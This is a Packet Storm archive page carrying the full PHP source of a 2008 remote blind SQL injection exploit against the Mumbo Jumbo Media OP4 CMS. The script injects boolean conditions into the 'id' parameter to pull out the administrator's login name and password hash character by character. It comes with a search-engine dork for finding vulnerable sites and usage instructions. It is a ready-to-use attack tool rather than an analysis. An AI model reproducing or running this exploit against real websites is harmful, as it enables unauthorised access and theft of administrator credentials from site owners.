exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mumbojumbo-sql.txt

mumbojumbo-sql.txt
Posted Apr 14, 2008
Authored by Lidloses_Auge

Mumbo Jumbo Media OP4 remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | dcd7c431d30cffe30f76ff235d454ba81bd2e34e07404541462c10e7beea1a4a

mumbojumbo-sql.txt

Change Mirror Download
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: Free-Hack, GPM
# Date: 13.04.2008
#
###############################################################
#
# Dork: "mumbo jumbo media" + inurl:"index.php"
# Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID]
# Example for "http://www.site.com/cms/index.php?id=300"
# => php '.$argv[0].' http://www.site.com/cms/ 300 1
#
###############################################################
');
if ($argc > 1) {
print_r('
');
echo 'Searching for Admin: ';
for($i=1; $i <= 50; $i++) {
$temp1 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kennung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--');
if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) {
$adlen = $i;
$i = 50;
}
}
for($i=1; $i <= $adlen; $i++) {
for($zahl=48; $zahl <= 122; $zahl++) {
$temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
echo chr($zahl);
$zahl = 122;
}
if ($zahl == 57) {
$zahl = 96;
}
}
}
print_r('
');
echo 'Searching for Hash: ';
for($i=1; $i <= 32; $i++) {
for($zahl=48; $zahl <= 102; $zahl++) {
if ($check = 0) {
$temp2 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--');
if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0) {
$zahl = 97;
$check = 1;
}
}
$temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
echo chr($zahl);
$zahl = 102;
}
if ($zahl == 57) {
$zahl = 97;
}
}
$check = 0;
}
}
?>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close